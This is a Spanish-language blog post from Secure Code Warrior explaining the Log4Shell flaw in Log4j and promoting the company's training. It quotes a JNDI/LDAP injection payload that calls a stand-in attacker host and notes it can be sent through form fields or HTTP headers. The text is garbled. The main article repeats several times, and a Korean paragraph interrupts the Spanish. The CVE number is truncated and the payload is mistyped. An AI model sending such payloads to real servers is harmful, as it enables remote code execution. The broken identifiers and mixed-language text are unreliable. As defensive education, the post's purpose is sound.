Descripción de la vulnerabilidad de Log4j: vectores de ataque y métodos de prevención
El 9 de diciembre se hizo público un exploit de día cero de la biblioteca Java Log4j. CVE-44228, apodado Log4Shell, recibió una calificación de «alta gravedad» (RACE) debido a que el exploit permite la ejecución remota de código. Además, log4j-core es una de las bibliotecas de registro Java más utilizadas, lo que pone en riesgo a millones de aplicaciones.
¿Desea mejorar rápidamente las habilidades necesarias para manejar Log4Shell?
Partiendo de los conceptos básicos de Log4Shell, hemos creado una demostración en el simulador Mission para que pueda experimentar el abuso de esta vulnerabilidad. En esta misión, le mostraremos cómo la vulnerabilidad de Log4j puede afectar a la infraestructura y las aplicaciones. Haga clic aquí para ir directamente a la demostración osiga leyendo para obtener más información sobre esta vulnerabilidad.
¿Noticias antiguas?
Los exploits no son nada nuevo. Los investigadores de seguridad ya lo destacaron en la conferencia Black Hat de 2016, con Álvaro Muñoz y Oleksandr Mirosh. «Las aplicaciones no deben realizar consultas JNDI con datos no fiables».Explicaron cómo la inyección JNDI/LDAP objetivo puede conducir a la ejecución remota de código. Esto es precisamente el núcleo de Log4Shell.
Vector de ataque
La carga útil de inyección de Log4Shell es la siguiente.
$ {indi:ldap: //attacker.host/xyz}
이를 이해하려면 자바의 표현식 언어 (EL) 에 대해 알아야 합니다.다음 구문으로 작성된 표현식: $ {expr} 런타임에 평가됩니다.예를 들어 $ {java:version} 은 사용 중인 자바 버전을 반환합니다.
A continuación, JNDI es una API que permite buscar datos o recursos conectándose a servicios mediante protocolos como Java Naming and Directory Interface, LDAP, DNS, RMI, etc. En pocas palabras, en el ejemplo anterior de carga maliciosa, JNDI realiza una búsqueda en un servidor LDAP controlado por el atacante. Por ejemplo, la respuesta puede apuntar a un archivo de clase Java que contiene código malicioso, que, a cambio, se ejecuta en un servidor vulnerable.
El motivo por el que esta vulnerabilidad es tan problemática es que Log4j evalúa todas las entradas de registro y consulta todas las entradas de usuario registradas escritas con la sintaxis EL con el prefijo «jndi». La carga útil se puede insertar en cualquier lugar donde el usuario pueda introducir datos, como los campos de formulario.Además, los encabezados HTTP (por ejemplo, User-Agent y X-Forwarded-For, entre otros) pueden personalizarse para transmitir la carga útil.
Para experimentar directamente el exploit, vaya al escaparate y pase a la fase 2: «Impacto de la experiencia».
Prevención: Concienciación
Log4j está parcheando el código vulnerable, por lo que se recomienda actualizar todas las aplicaciones. Sin embargo, las versiones 2.15.0 y 2.16.0 contienen vulnerabilidades DDoS y otras, por lo que se recomienda actualizar a la versión 2.17.0 a partir de finales de diciembre.
Como desarrolladores que escribimos código, siempre debemos tener en cuenta la seguridad. Log4Shell nos ha enseñado que el uso de marcos o bibliotecas de terceros conlleva riesgos. Debemos tener presente que el uso de fuentes externas que ingenuamente consideramos seguras puede comprometer la seguridad de nuestras aplicaciones.
¿Se podría haber evitado esta vulnerabilidad? Sí y no. Por un lado, hay muchas cosas que los desarrolladores pueden hacer solo cuando los componentes vulnerables se introducen a través de software de terceros. Por otro lado, la lección aprendida se ha repetido una y otra vez: nunca confíes en las entradas de los usuarios.
Secure Code Warrior cree que la mejor manera de evitar vulnerabilidades en el código es que los desarrolladores den prioridad a la seguridad. SCW ofrece formación a gran escala sobre marcos de programación específicos, lo que permitió a los clientes empresariales identificar rápidamente a los desarrolladores Java afectados utilizando los datos de los informes. Además, con la ayuda de expertos en seguridad formados por SCW, se aceleró la actualización de Log4j.
Secure Code Warrior ofrece Sensei, un complemento gratuito para IntelliJ, especialmente diseñado para desarrolladores Java. Esta herramienta de análisis de código basada en reglas se puede utilizar para aplicar directrices de codificación y prevenir y resolver vulnerabilidades. Se pueden crear reglas propias o utilizar reglas predefinidas. Libro de recetas. Eche un vistazo a nuestras recetas y no se olvide de descargar nuestro libro de recetas Log4j, que le ayudará a encontrar y resolver la vulnerabilidad Log4Shell en un abrir y cerrar de ojos.
Actualice sus tecnologías de defensa contra Log4Shell.
¿Desea aplicar lo aprendido en esta publicación del blog? El escaparate puede resultarle útil. Al iniciar el escaparate, se revisará rápidamente esta vulnerabilidad y, a continuación, se le dirigirá a un entorno de simulación en el que podrá intentar el exploit siguiendo las instrucciones proporcionadas.
En diciembre de 2021, se reveló una grave vulnerabilidad de seguridad llamada Log4Shell en la biblioteca Java Log4j. En este documento, se desglosa la vulnerabilidad Log4Shell de la forma más sencilla posible para comprender los conceptos básicos y, basándose en el conocimiento de esta vulnerabilidad, se presenta un entorno de pruebas en el que se puede explotar un sitio web simulado.
Secure Code Warrior está aquí para ayudar a las organizaciones a proteger el código durante todo el ciclo de vida del desarrollo de software y a crear una cultura que priorice la ciberseguridad. Ya seas administrador de AppSec, desarrollador, CISO o cualquier persona relacionada con la seguridad, podemos ayudarte a reducir los riesgos asociados al código inseguro en tu organización.
Reserva de demostración
Laura Verheyde es una desarrolladora de software en Secure Code Warrior centrada en la investigación de vulnerabilidades y la creación de contenidos para Missions y Coding labs.
El 9 de diciembre se hizo público un exploit de día cero de la biblioteca Java Log4j. CVE-44228, apodado Log4Shell, recibió una calificación de «alta gravedad» (RACE) debido a que el exploit permite la ejecución remota de código. Además, log4j-core es una de las bibliotecas de registro Java más utilizadas, lo que pone en riesgo a millones de aplicaciones.
¿Desea mejorar rápidamente las habilidades necesarias para manejar Log4Shell?
Partiendo de los conceptos básicos de Log4Shell, hemos creado una demostración en el simulador Mission para que pueda experimentar el abuso de esta vulnerabilidad. En esta misión, le mostraremos cómo la vulnerabilidad de Log4j puede afectar a la infraestructura y las aplicaciones. Haga clic aquí para ir directamente a la demostración osiga leyendo para obtener más información sobre esta vulnerabilidad.
¿Noticias antiguas?
Los exploits no son nada nuevo. Los investigadores de seguridad ya lo destacaron en la conferencia Black Hat de 2016, con Álvaro Muñoz y Oleksandr Mirosh. «Las aplicaciones no deben realizar consultas JNDI con datos no fiables».Explicaron cómo la inyección JNDI/LDAP objetivo puede conducir a la ejecución remota de código. Esto es precisamente el núcleo de Log4Shell.
Vector de ataque
La carga útil de inyección de Log4Shell es la siguiente.
$ {indi:ldap: //attacker.host/xyz}
이를 이해하려면 자바의 표현식 언어 (EL) 에 대해 알아야 합니다.다음 구문으로 작성된 표현식: $ {expr} 런타임에 평가됩니다.예를 들어 $ {java:version} 은 사용 중인 자바 버전을 반환합니다.
A continuación, JNDI es una API que permite buscar datos o recursos conectándose a servicios mediante protocolos como Java Naming and Directory Interface, LDAP, DNS, RMI, etc. En pocas palabras, en el ejemplo anterior de carga maliciosa, JNDI realiza una búsqueda en un servidor LDAP controlado por el atacante. Por ejemplo, la respuesta puede apuntar a un archivo de clase Java que contiene código malicioso, que, a cambio, se ejecuta en un servidor vulnerable.
El motivo por el que esta vulnerabilidad es tan problemática es que Log4j evalúa todas las entradas de registro y consulta todas las entradas de usuario registradas escritas con la sintaxis EL con el prefijo «jndi». La carga útil se puede insertar en cualquier lugar donde el usuario pueda introducir datos, como los campos de formulario.Además, los encabezados HTTP (por ejemplo, User-Agent y X-Forwarded-For, entre otros) pueden personalizarse para transmitir la carga útil.
Para experimentar directamente el exploit, vaya al escaparate y pase a la fase 2: «Impacto de la experiencia».
Prevención: Concienciación
Log4j está parcheando el código vulnerable, por lo que se recomienda actualizar todas las aplicaciones. Sin embargo, las versiones 2.15.0 y 2.16.0 contienen vulnerabilidades DDoS y otras, por lo que se recomienda actualizar a la versión 2.17.0 a partir de finales de diciembre.
Como desarrolladores que escribimos código, siempre debemos tener en cuenta la seguridad. Log4Shell nos ha enseñado que el uso de marcos o bibliotecas de terceros conlleva riesgos. Debemos tener presente que el uso de fuentes externas que ingenuamente consideramos seguras puede comprometer la seguridad de nuestras aplicaciones.
¿Se podría haber evitado esta vulnerabilidad? Sí y no. Por un lado, hay muchas cosas que los desarrolladores pueden hacer solo cuando los componentes vulnerables se introducen a través de software de terceros. Por otro lado, la lección aprendida se ha repetido una y otra vez: nunca confíes en las entradas de los usuarios.
Secure Code Warrior cree que la mejor manera de evitar vulnerabilidades en el código es que los desarrolladores den prioridad a la seguridad. SCW ofrece formación a gran escala sobre marcos de programación específicos, lo que permitió a los clientes empresariales identificar rápidamente a los desarrolladores Java afectados utilizando los datos de los informes. Además, con la ayuda de expertos en seguridad formados por SCW, se aceleró la actualización de Log4j.
Secure Code Warrior ofrece Sensei, un complemento gratuito para IntelliJ, especialmente diseñado para desarrolladores Java. Esta herramienta de análisis de código basada en reglas se puede utilizar para aplicar directrices de codificación y prevenir y resolver vulnerabilidades. Se pueden crear reglas propias o utilizar reglas predefinidas. Libro de recetas. Eche un vistazo a nuestras recetas y no se olvide de descargar nuestro libro de recetas Log4j, que le ayudará a encontrar y resolver la vulnerabilidad Log4Shell en un abrir y cerrar de ojos.
Actualice sus tecnologías de defensa contra Log4Shell.
¿Desea aplicar lo aprendido en esta publicación del blog? El escaparate puede resultarle útil. Al iniciar el escaparate, se revisará rápidamente esta vulnerabilidad y, a continuación, se le dirigirá a un entorno de simulación en el que podrá intentar el exploit siguiendo las instrucciones proporcionadas.
El 9 de diciembre se hizo público un exploit de día cero de la biblioteca Java Log4j. CVE-44228, apodado Log4Shell, recibió una calificación de «alta gravedad» (RACE) debido a que el exploit permite la ejecución remota de código. Además, log4j-core es una de las bibliotecas de registro Java más utilizadas, lo que pone en riesgo a millones de aplicaciones.
¿Desea mejorar rápidamente las habilidades necesarias para manejar Log4Shell?
Partiendo de los conceptos básicos de Log4Shell, hemos creado una demostración en el simulador Mission para que pueda experimentar el abuso de esta vulnerabilidad. En esta misión, le mostraremos cómo la vulnerabilidad de Log4j puede afectar a la infraestructura y las aplicaciones. Haga clic aquí para ir directamente a la demostración osiga leyendo para obtener más información sobre esta vulnerabilidad.
¿Noticias antiguas?
Los exploits no son nada nuevo. Los investigadores de seguridad ya lo destacaron en la conferencia Black Hat de 2016, con Álvaro Muñoz y Oleksandr Mirosh. «Las aplicaciones no deben realizar consultas JNDI con datos no fiables».Explicaron cómo la inyección JNDI/LDAP objetivo puede conducir a la ejecución remota de código. Esto es precisamente el núcleo de Log4Shell.
Vector de ataque
La carga útil de inyección de Log4Shell es la siguiente.
$ {indi:ldap: //attacker.host/xyz}
이를 이해하려면 자바의 표현식 언어 (EL) 에 대해 알아야 합니다.다음 구문으로 작성된 표현식: $ {expr} 런타임에 평가됩니다.예를 들어 $ {java:version} 은 사용 중인 자바 버전을 반환합니다.
A continuación, JNDI es una API que permite buscar datos o recursos conectándose a servicios mediante protocolos como Java Naming and Directory Interface, LDAP, DNS, RMI, etc. En pocas palabras, en el ejemplo anterior de carga maliciosa, JNDI realiza una búsqueda en un servidor LDAP controlado por el atacante. Por ejemplo, la respuesta puede apuntar a un archivo de clase Java que contiene código malicioso, que, a cambio, se ejecuta en un servidor vulnerable.
El motivo por el que esta vulnerabilidad es tan problemática es que Log4j evalúa todas las entradas de registro y consulta todas las entradas de usuario registradas escritas con la sintaxis EL con el prefijo «jndi». La carga útil se puede insertar en cualquier lugar donde el usuario pueda introducir datos, como los campos de formulario.Además, los encabezados HTTP (por ejemplo, User-Agent y X-Forwarded-For, entre otros) pueden personalizarse para transmitir la carga útil.
Para experimentar directamente el exploit, vaya al escaparate y pase a la fase 2: «Impacto de la experiencia».
Prevención: Concienciación
Log4j está parcheando el código vulnerable, por lo que se recomienda actualizar todas las aplicaciones. Sin embargo, las versiones 2.15.0 y 2.16.0 contienen vulnerabilidades DDoS y otras, por lo que se recomienda actualizar a la versión 2.17.0 a partir de finales de diciembre.
Como desarrolladores que escribimos código, siempre debemos tener en cuenta la seguridad. Log4Shell nos ha enseñado que el uso de marcos o bibliotecas de terceros conlleva riesgos. Debemos tener presente que el uso de fuentes externas que ingenuamente consideramos seguras puede comprometer la seguridad de nuestras aplicaciones.
¿Se podría haber evitado esta vulnerabilidad? Sí y no. Por un lado, hay muchas cosas que los desarrolladores pueden hacer solo cuando los componentes vulnerables se introducen a través de software de terceros. Por otro lado, la lección aprendida se ha repetido una y otra vez: nunca confíes en las entradas de los usuarios.
Secure Code Warrior cree que la mejor manera de evitar vulnerabilidades en el código es que los desarrolladores den prioridad a la seguridad. SCW ofrece formación a gran escala sobre marcos de programación específicos, lo que permitió a los clientes empresariales identificar rápidamente a los desarrolladores Java afectados utilizando los datos de los informes. Además, con la ayuda de expertos en seguridad formados por SCW, se aceleró la actualización de Log4j.
Secure Code Warrior ofrece Sensei, un complemento gratuito para IntelliJ, especialmente diseñado para desarrolladores Java. Esta herramienta de análisis de código basada en reglas se puede utilizar para aplicar directrices de codificación y prevenir y resolver vulnerabilidades. Se pueden crear reglas propias o utilizar reglas predefinidas. Libro de recetas. Eche un vistazo a nuestras recetas y no se olvide de descargar nuestro libro de recetas Log4j, que le ayudará a encontrar y resolver la vulnerabilidad Log4Shell en un abrir y cerrar de ojos.
Actualice sus tecnologías de defensa contra Log4Shell.
¿Desea aplicar lo aprendido en esta publicación del blog? El escaparate puede resultarle útil. Al iniciar el escaparate, se revisará rápidamente esta vulnerabilidad y, a continuación, se le dirigirá a un entorno de simulación en el que podrá intentar el exploit siguiendo las instrucciones proporcionadas.
Haga clic en el siguiente enlace y descargue el PDF de este recurso.
Secure Code Warrior está aquí para ayudar a las organizaciones a proteger el código durante todo el ciclo de vida del desarrollo de software y a crear una cultura que priorice la ciberseguridad. Ya seas administrador de AppSec, desarrollador, CISO o cualquier persona relacionada con la seguridad, podemos ayudarte a reducir los riesgos asociados al código inseguro en tu organización.
Ver informeReserva de demostración
Laura Verheyde es una desarrolladora de software en Secure Code Warrior centrada en la investigación de vulnerabilidades y la creación de contenidos para Missions y Coding labs.
El 9 de diciembre se hizo público un exploit de día cero de la biblioteca Java Log4j. CVE-44228, apodado Log4Shell, recibió una calificación de «alta gravedad» (RACE) debido a que el exploit permite la ejecución remota de código. Además, log4j-core es una de las bibliotecas de registro Java más utilizadas, lo que pone en riesgo a millones de aplicaciones.
¿Desea mejorar rápidamente las habilidades necesarias para manejar Log4Shell?
Partiendo de los conceptos básicos de Log4Shell, hemos creado una demostración en el simulador Mission para que pueda experimentar el abuso de esta vulnerabilidad. En esta misión, le mostraremos cómo la vulnerabilidad de Log4j puede afectar a la infraestructura y las aplicaciones. Haga clic aquí para ir directamente a la demostración osiga leyendo para obtener más información sobre esta vulnerabilidad.
¿Noticias antiguas?
Los exploits no son nada nuevo. Los investigadores de seguridad ya lo destacaron en la conferencia Black Hat de 2016, con Álvaro Muñoz y Oleksandr Mirosh. «Las aplicaciones no deben realizar consultas JNDI con datos no fiables».Explicaron cómo la inyección JNDI/LDAP objetivo puede conducir a la ejecución remota de código. Esto es precisamente el núcleo de Log4Shell.
Vector de ataque
La carga útil de inyección de Log4Shell es la siguiente.
$ {indi:ldap: //attacker.host/xyz}
이를 이해하려면 자바의 표현식 언어 (EL) 에 대해 알아야 합니다.다음 구문으로 작성된 표현식: $ {expr} 런타임에 평가됩니다.예를 들어 $ {java:version} 은 사용 중인 자바 버전을 반환합니다.
A continuación, JNDI es una API que permite buscar datos o recursos conectándose a servicios mediante protocolos como Java Naming and Directory Interface, LDAP, DNS, RMI, etc. En pocas palabras, en el ejemplo anterior de carga maliciosa, JNDI realiza una búsqueda en un servidor LDAP controlado por el atacante. Por ejemplo, la respuesta puede apuntar a un archivo de clase Java que contiene código malicioso, que, a cambio, se ejecuta en un servidor vulnerable.
El motivo por el que esta vulnerabilidad es tan problemática es que Log4j evalúa todas las entradas de registro y consulta todas las entradas de usuario registradas escritas con la sintaxis EL con el prefijo «jndi». La carga útil se puede insertar en cualquier lugar donde el usuario pueda introducir datos, como los campos de formulario.Además, los encabezados HTTP (por ejemplo, User-Agent y X-Forwarded-For, entre otros) pueden personalizarse para transmitir la carga útil.
Para experimentar directamente el exploit, vaya al escaparate y pase a la fase 2: «Impacto de la experiencia».
Prevención: Concienciación
Log4j está parcheando el código vulnerable, por lo que se recomienda actualizar todas las aplicaciones. Sin embargo, las versiones 2.15.0 y 2.16.0 contienen vulnerabilidades DDoS y otras, por lo que se recomienda actualizar a la versión 2.17.0 a partir de finales de diciembre.
Como desarrolladores que escribimos código, siempre debemos tener en cuenta la seguridad. Log4Shell nos ha enseñado que el uso de marcos o bibliotecas de terceros conlleva riesgos. Debemos tener presente que el uso de fuentes externas que ingenuamente consideramos seguras puede comprometer la seguridad de nuestras aplicaciones.
¿Se podría haber evitado esta vulnerabilidad? Sí y no. Por un lado, hay muchas cosas que los desarrolladores pueden hacer solo cuando los componentes vulnerables se introducen a través de software de terceros. Por otro lado, la lección aprendida se ha repetido una y otra vez: nunca confíes en las entradas de los usuarios.
Secure Code Warrior cree que la mejor manera de evitar vulnerabilidades en el código es que los desarrolladores den prioridad a la seguridad. SCW ofrece formación a gran escala sobre marcos de programación específicos, lo que permitió a los clientes empresariales identificar rápidamente a los desarrolladores Java afectados utilizando los datos de los informes. Además, con la ayuda de expertos en seguridad formados por SCW, se aceleró la actualización de Log4j.
Secure Code Warrior ofrece Sensei, un complemento gratuito para IntelliJ, especialmente diseñado para desarrolladores Java. Esta herramienta de análisis de código basada en reglas se puede utilizar para aplicar directrices de codificación y prevenir y resolver vulnerabilidades. Se pueden crear reglas propias o utilizar reglas predefinidas. Libro de recetas. Eche un vistazo a nuestras recetas y no se olvide de descargar nuestro libro de recetas Log4j, que le ayudará a encontrar y resolver la vulnerabilidad Log4Shell en un abrir y cerrar de ojos.
Actualice sus tecnologías de defensa contra Log4Shell.
¿Desea aplicar lo aprendido en esta publicación del blog? El escaparate puede resultarle útil. Al iniciar el escaparate, se revisará rápidamente esta vulnerabilidad y, a continuación, se le dirigirá a un entorno de simulación en el que podrá intentar el exploit siguiendo las instrucciones proporcionadas.
Índice
Secure Code Warrior está aquí para ayudar a las organizaciones a proteger el código durante todo el ciclo de vida del desarrollo de software y a crear una cultura que priorice la ciberseguridad. Ya seas administrador de AppSec, desarrollador, CISO o cualquier persona relacionada con la seguridad, podemos ayudarte a reducir los riesgos asociados al código inseguro en tu organización.
Reserva de demostraciónDescargarRecursos útiles para empezar
Temas y contenidos de la formación sobre códigos de seguridad
El mejor contenido del sector evoluciona constantemente para adaptarse al entorno de desarrollo de software en constante cambio, teniendo en cuenta el papel de los clientes. Se ofrecen temas que abarcan desde la inteligencia artificial hasta la inyección de XQuery, para diversas funciones, desde arquitectos e ingenieros hasta gestores de productos y control de calidad. Eche un vistazo al contenido que ofrece el catálogo por temas y funciones.
La Cámara de Comercio establece el estándar para la seguridad impulsada por desarrolladores a gran escala
Kamer van Koophandel comparte cómo ha integrado la codificación segura en el desarrollo diario mediante certificaciones basadas en roles, evaluaciones comparativas de Trust Score y una cultura de responsabilidad compartida en materia de seguridad.
%20(1).avif)
.avif)
Modelado de amenazas con IA: convertir a cada desarrollador en un modelador de amenazas
Saldrá mejor equipado para ayudar a los desarrolladores a combinar ideas y técnicas de modelado de amenazas con las herramientas de IA que ya utilizan para reforzar la seguridad, mejorar la colaboración y crear software más resistente desde el principio.
Recursos útiles para empezar
Cybermon ha vuelto: la misión de IA para derrotar al jefe ahora está disponible bajo demanda.
Cybermon 2025 Bit the Boss ya está disponible en SCW durante todo el año. Implemente tareas de seguridad avanzadas de IA/LLM para impulsar el desarrollo de IA de seguridad a gran escala.
Explicación de la Ley de Resiliencia Cibernética: El significado del diseño de seguridad en el desarrollo de software
Descubra los requisitos y el ámbito de aplicación de la Ley de Resiliencia Cibernética (CRA) de la UE, y cómo el equipo de ingeniería puede prepararse de forma segura mediante el diseño, las prácticas, la prevención de vulnerabilidades y la creación de un entorno de desarrollo.
Factor de éxito 1: Criterios de éxito definidos y medibles
El habilitador 1 ofrece una serie de 10 partes sobre los habilitadores del éxito, mostrando cómo la codificación segura puede mejorar los resultados empresariales, como la reducción de riesgos y costes y la aceleración de la madurez de los programas a largo plazo.
